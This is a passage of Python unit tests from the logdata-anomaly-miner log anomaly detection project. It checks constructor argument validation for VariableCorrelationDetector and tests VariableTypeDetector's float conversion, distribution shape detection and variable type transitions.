[self.stream_printer_event_handler], etd, validate_cor_distinct_thres={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_distinct_thres=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_distinct_thres=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_distinct_thres=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_distinct_thres=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_distinct_thres=0) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_distinct_thres=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, validate_cor_distinct_thres=1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list="") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=True) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=["/model/path"]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=[]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, ignore_list=None) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list="") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=True) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=["/model/path"]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=[]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, constraint_list=None) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=100) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list="") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=True) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=["file:///tmp/syslog"]) logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/VariableTypeDetectorTest.py000066400000000000000000004170101500476301700311010ustar00rootroot00000000000000from aminer.analysis.EventTypeDetector import EventTypeDetector from aminer.analysis.VariableTypeDetector import VariableTypeDetector, convert_to_floats, consists_of_ints, consists_of_floats from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD import time import pickle import random class VariableTypeDetectorTest(TestBase): """Unittests for the VariableTypeDetector.""" path = "path" def test1convert_to_floats(self): """This unittest tests possible inputs of the convert_to_floats function.""" # use a list full of floats float_list = [11.123, 12.0, 13.55, 12.11] result = convert_to_floats(float_list) self.assertEqual(float_list, result, result) # use a list containing some floats and integers float_int_list = [11.123, 12, 13.55, 12.11, 120] result = convert_to_floats(float_int_list) self.assertEqual([11.123, 12.0, 13.55, 12.11, 120.0], result, result) # use a list of strings with float values string_float_list = ["11.123", "12.0", "13.55", b"12.11"] result = convert_to_floats(string_float_list) self.assertEqual(float_list, result, result) # use a list of strings with values being no floats string_no_float_list = ["11.123", "10:24 AM", "13.55", b"12.11"] result = convert_to_floats(string_no_float_list) self.assertFalse(result) def test2consists_of_ints(self): """This unittest tests possible inputs of the consists_of_ints function.""" # use a list full of integers int_list = [11, 12, 27, 33, 190] self.assertTrue(consists_of_ints(int_list)) # use a list containing integers and floats int_float_list = [11, 12, 27, 33.0, 190] self.assertTrue(consists_of_ints(int_float_list)) # use a list containing integers and floats int_float_list = [11, 12, 27, 33.0, 190.2] self.assertFalse(consists_of_ints(int_float_list)) # use a list with integers as strings string_int_list = ["11", "12", "27", "33", b"190"] self.assertFalse(consists_of_ints(string_int_list)) def test3detect_continuous_shape_fixed_data(self): """ This unittest tests possible continuously distributed variables raising from the detect_continous_shape method. It uses fix data sets. Every distribution has generated 20*100 Datasets and var_ev = 0, var_var = 1. """ # Number of execution of the tested function iterations = 20 # Size of the initial datasample dataset_size = 100 # Significance level significance_niveau = 0.05 # load data with open("unit/data/vtd_data/uni_data_test3", "rb") as f: [uni_data_list, uni_result_shapes_ks, uni_result_shapes_cm] = pickle.load(f) with open("unit/data/vtd_data/nor_data_test3", "rb") as f: [nor_data_list, nor_result_shapes_ks, nor_result_shapes_cm] = pickle.load(f) with open("unit/data/vtd_data/beta1_data_test3", "rb") as f: [beta1_data_list, beta1_result_shapes_ks, beta1_result_shapes_cm] = pickle.load(f) with open("unit/data/vtd_data/beta2_data_test3", "rb") as f: [beta2_data_list, beta2_result_shapes_ks, beta2_result_shapes_cm] = pickle.load(f) with open("unit/data/vtd_data/beta3_data_test3", "rb") as f: [beta3_data_list, beta3_result_shapes_ks, beta3_result_shapes_cm] = pickle.load(f) with open("unit/data/vtd_data/beta4_data_test3", "rb") as f: [beta4_data_list, beta4_result_shapes_ks, beta4_result_shapes_cm] = pickle.load(f) with open("unit/data/vtd_data/beta5_data_test3", "rb") as f: [beta5_data_list, beta5_result_shapes_ks, beta5_result_shapes_cm] = pickle.load(f) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd_ks = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=dataset_size, div_thres=0.5, test_gof_int=True, sim_thres=0.3, gof_alpha=significance_niveau, used_gof_test="KS") vtd_cm = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=dataset_size, div_thres=0.5, test_gof_int=True, sim_thres=0.3, gof_alpha=significance_niveau, used_gof_test="CM") result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): distribution_list = vtd_ks.detect_continuous_shape(uni_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if distribution_list[0] == "uni" or "uni" in [distr[0] for distr in distribution_list[-1]]: result_list_ks.append(1) else: result_list_ks.append(0) distribution_list = vtd_cm.detect_continuous_shape(uni_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if distribution_list[0] == "uni" or "uni" in [distr[0] for distr in distribution_list[-1]]: result_list_cm.append(1) else: result_list_cm.append(0) # Test if the result list is correct self.assertTrue(result_list_ks == uni_result_shapes_ks) self.assertTrue(result_list_cm == uni_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): distribution_list = vtd_ks.detect_continuous_shape(nor_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if distribution_list[0] == "nor" or "nor" in [distr[0] for distr in distribution_list[-1]]: result_list_ks.append(1) else: result_list_ks.append(0) distribution_list = vtd_cm.detect_continuous_shape(nor_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if distribution_list[0] == "nor" or "nor" in [distr[0] for distr in distribution_list[-1]]: result_list_cm.append(1) else: result_list_cm.append(0) # Test if the result list is correct self.assertTrue(result_list_ks == nor_result_shapes_ks) self.assertTrue(result_list_cm == nor_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): distribution_list = vtd_ks.detect_continuous_shape(beta1_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if (distribution_list[0] == "beta" and distribution_list[-2] == 1) or "beta1" in [ distr[0]+str(distr[-1]) for distr in distribution_list[-1]]: result_list_ks.append(1) else: result_list_ks.append(0) distribution_list = vtd_cm.detect_continuous_shape(beta1_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if (distribution_list[0] == "beta" and distribution_list[-2] == 1) or "beta1" in [ distr[0]+str(distr[-1]) for distr in distribution_list[-1]]: result_list_cm.append(1) else: result_list_cm.append(0) # Test if the result list is correct self.assertTrue(result_list_ks == beta1_result_shapes_ks) self.assertTrue(result_list_cm == beta1_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): distribution_list = vtd_ks.detect_continuous_shape(beta2_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if (distribution_list[0] == "beta" and distribution_list[-2] == 2) or "beta2" in [ distr[0]+str(distr[-1]) for distr in distribution_list[-1]]: result_list_ks.append(1) else: result_list_ks.append(0) distribution_list = vtd_cm.detect_continuous_shape(beta2_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if (distribution_list[0] == "beta" and distribution_list[-2] == 2) or "beta2" in [ distr[0]+str(distr[-1]) for distr in distribution_list[-1]]: result_list_cm.append(1) else: result_list_cm.append(0) # Test if the result list is correct self.assertTrue(result_list_ks == beta2_result_shapes_ks) self.assertTrue(result_list_cm == beta2_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): distribution_list = vtd_ks.detect_continuous_shape(beta3_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if (distribution_list[0] == "beta" and distribution_list[-2] == 3) or "beta3" in [ distr[0]+str(distr[-1]) for distr in distribution_list[-1]]: result_list_ks.append(1) else: result_list_ks.append(0) distribution_list = vtd_cm.detect_continuous_shape(beta3_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if (distribution_list[0] == "beta" and distribution_list[-2] == 3) or "beta3" in [ distr[0]+str(distr[-1]) for distr in distribution_list[-1]]: result_list_cm.append(1) else: result_list_cm.append(0) # Test if the result list is correct self.assertTrue(result_list_ks == beta3_result_shapes_ks) self.assertTrue(result_list_cm == beta3_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): distribution_list = vtd_ks.detect_continuous_shape(beta4_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if (distribution_list[0] == "beta" and distribution_list[-2] == 4) or "beta4" in [ distr[0]+str(distr[-1]) for distr in distribution_list[-1]]: result_list_ks.append(1) else: result_list_ks.append(0) distribution_list = vtd_cm.detect_continuous_shape(beta4_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if (distribution_list[0] == "beta" and distribution_list[-2] == 4) or "beta4" in [ distr[0]+str(distr[-1]) for distr in distribution_list[-1]]: result_list_cm.append(1) else: result_list_cm.append(0) # Test if the result list is correct self.assertTrue(result_list_ks == beta4_result_shapes_ks) self.assertTrue(result_list_cm == beta4_result_shapes_cm) result_list_ks = [] # List of the results of the single tests result_list_cm = [] # List of the results of the single tests for i in range(iterations): distribution_list = vtd_ks.detect_continuous_shape(beta5_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if (distribution_list[0] == "beta" and distribution_list[-2] == 5) or "beta5" in [ distr[0]+str(distr[-1]) for distr in distribution_list[-1]]: result_list_ks.append(1) else: result_list_ks.append(0) distribution_list = vtd_cm.detect_continuous_shape(beta5_data_list[i * dataset_size:(i + 1) * dataset_size]) # Add if the searched distribution is present in the found distributions if (distribution_list[0] == "beta" and distribution_list[-2] == 5) or "beta5" in [ distr[0]+str(distr[-1]) for distr in distribution_list[-1]]: result_list_cm.append(1) else: result_list_cm.append(0) # Test if the result list is correct self.assertTrue(result_list_ks == beta5_result_shapes_ks) self.assertTrue(result_list_cm == beta5_result_shapes_cm) def test4detect_var_type(self): """This unittest tests possible scenarios of the detect_var_type method.""" # Load list of an uniformal distributed sample which consists of integers with open("unit/data/vtd_data/uni_data_test4", "rb") as f: uni_data_list_int = pickle.load(f) num_init = 100 etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, used_gof_test="KS") t = time.time() # test the "static" path of detect_var_type stat_data = b"5.3.0-55-generic" log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) # check what happens if less than numMinAppearance values are available for i in range(num_init): self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) self.assertEqual(["stat", [stat_data.decode()], False], result) # reset etd and vtd for clear results. etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, used_gof_test="KS") # test ascending with float values for i in range(num_init): stat_data = bytes(str(i * 0.1), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) self.assertEqual(["asc", "float"], result) # reset etd and vtd for clear results. etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, used_gof_test="KS") # test ascending with integer values for i in range(num_init): stat_data = bytes(str(i), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) self.assertEqual(["asc", "int"], result) # reset etd and vtd for clear results. etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, used_gof_test="KS") # test descending with float values for i in range(num_init, 0, -1): stat_data = bytes(str(i * 0.1), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) self.assertEqual(["desc", "float"], result) # reset etd and vtd for clear results. etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, used_gof_test="KS") # test descending with integer values for i in range(num_init, 0, -1): stat_data = bytes(str(i), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) self.assertEqual(["desc", "int"], result) # reset etd and vtd for clear results. etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, div_thres=0.3, test_gof_int=True, used_gof_test="KS") # test "num_init" and "div_thres" values = [] for i in range(num_init): stat_data = bytes(str(uni_data_list_int[i]), "utf-8") values.append(float(stat_data)) log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) # this means that the uniformal distribution must be detected. self.assertTrue(result[0] == "uni" or (isinstance(result[-1], list) and "uni" in [distr[0] for distr in result[-1]]), result) # test "divThres" option for the continuous distribution vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, div_thres=1.0, test_gof_int=True, used_gof_test="KS") result = vtd.detect_var_type(0, 0) self.assertEqual(["unq", values], result) # test "testInt" option for the continuous distribution vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, div_thres=0.3, test_gof_int=False, used_gof_test="KS") result = vtd.detect_var_type(0, 0) self.assertEqual(["unq", values], result) # test "simThres" option to result in "others" vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, div_thres=0.5, test_gof_int=False, sim_thres=0.5, used_gof_test="KS") values = [] for i in range(100): stat_data = bytes(str((i % 50) * 0.1), "utf-8") values.append(float(stat_data)) log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) # at least (1 - "simThresh") * "numMinAppearance" and maximal "numMinAppearance" * "divThres" - 1 unique values must exist. self.assertEqual(["others", 0], result) # test discrete result vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=num_init, div_thres=0.5, test_gof_int=False, sim_thres=0.3, used_gof_test="KS") values = [] for i in range(num_init): stat_data = bytes(str((i % 50) * 0.1), "utf-8") values.append(float(stat_data)) log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) result = vtd.detect_var_type(0, 0) values_set = list(set(values)) values_app = [0 for _ in range(len(values_set))] for value in values: values_app[values_set.index(value)] += 1 values_app = [x / len(values) for x in values_app] self.assertEqual(["d", values_set, values_app, len(values)], result) def test5consists_of_floats(self): """This unittest tests the consists_of_floats method.""" # test an empty list data_list = [] self.assertTrue(consists_of_floats(data_list)) # test a list of integers and floats data_list = [10, 11.12, 13, 177, 0.5, 0.] self.assertTrue(consists_of_floats(data_list)) # test a list containing a string data_list = [10, 11.12, 13, 177, 0.5, 0., "dd"] self.assertFalse(consists_of_floats(data_list)) # test a list containing bytes data_list = [10, 11.12, 13, 177, 0.5, 0., b"x"] self.assertFalse(consists_of_floats(data_list)) def test6receive_atom(self): """ This unittest tests if atoms are sorted to the right distribution and if the update steps also work properly. Therefore, the assumption that after 200 values the VTD with the default parameters can change to the right distribution. """ # load data with open("unit/data/vtd_data/nor_data_test6", "rb") as f: nor_data_list = pickle.load(f) with open("unit/data/vtd_data/beta1_data_test6", "rb") as f: beta1_data_list = pickle.load(f) with open("unit/data/vtd_data/uni_data_test6", "rb") as f: uni_data_list = pickle.load(f) nor_data_list = nor_data_list*10 beta1_data_list = beta1_data_list*10 vtd_arguments = [(50, 30), (75, 50), (100, 50), (100, 75), (100, 100)] for init, update in vtd_arguments: etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0) t = time.time() stat_data = b"True" log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) # initialize data for i in range(init): self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(["stat", [stat_data.decode()], True], result, (init, update, result)) # static -> static for i in range(update): self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(["stat", [stat_data.decode()], True], result, (init, update, result)) # static -> uni for uni_data in uni_data_list[2*update:4*update]: uni_data = str(uni_data) encoded_data = uni_data.encode() log_atom = LogAtom(encoded_data, ParserMatch(MatchElement(self.path, encoded_data, uni_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] pos_distr = vtd.alternative_distribution_types[0][0] self.assertTrue(result[0] == "uni" or "uni" in [distr[0] for distr in pos_distr], (init, update, result)) # uni -> others for i in range(update): stat_data = bytes(str((i % int(update / 5))), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(["others", 0], result, (init, update, result)) # others -> d for i in range(update): stat_data = bytes(str((i % int(update / 5))), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual("d", result[0], (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0, num_d_bt=30) # initialize with d for i in range(init): stat_data = bytes(str((i % int(update / 5))), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual("d", result[0], (init, update, result)) # discrete to others with new values for uni_data in [i / update for i in range(update)]: uni_data = str(uni_data) encoded_data = uni_data.encode() log_atom = LogAtom(encoded_data, ParserMatch(MatchElement(self.path, encoded_data, uni_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(["others", 0], result, (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0, num_d_bt=20) # initialize with d for i in range(init): stat_data = bytes(str((i % int(update / 5))), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual("d", result[0], (init, update, result)) # discrete to others without new values, low num_d_bt for i in range(update): stat_data = bytes(str((i % int(update / 20))), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(["others", 0], result, (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0, num_d_bt=100) # initialize with d for i in range(init): stat_data = bytes(str((i % int(update / 5))), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual("d", result[0], (init, update, result)) # discrete to others without new values, high num_d_bt for i in range(update): stat_data = bytes(str((i % int(update / 20))), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertNotEqual(["others", 0], result, (init, update, result)) # reset all etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=init, num_update=update, num_s_gof_values=update, div_thres=0.45, sim_thres=0.75, num_pause_others=0) t = time.time() stat_data = b"True" log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) # initialize data for i in range(init): self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(["stat", [stat_data.decode()], True], result, (init, update, result)) # static -> asc for i in range(2*update): stat_data = bytes(str(i * 0.1), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement(self.path, stat_data, stat_data, None)), t, self.__class__.__name__) self.assertTrue(etd.receive_atom(log_atom)) vtd.receive_atom(log_atom) result = vtd.var_type[0][0] self.assertEqual(["asc", "float"], result, (init, update, result)) # asc -> desc for i in range(2*update, 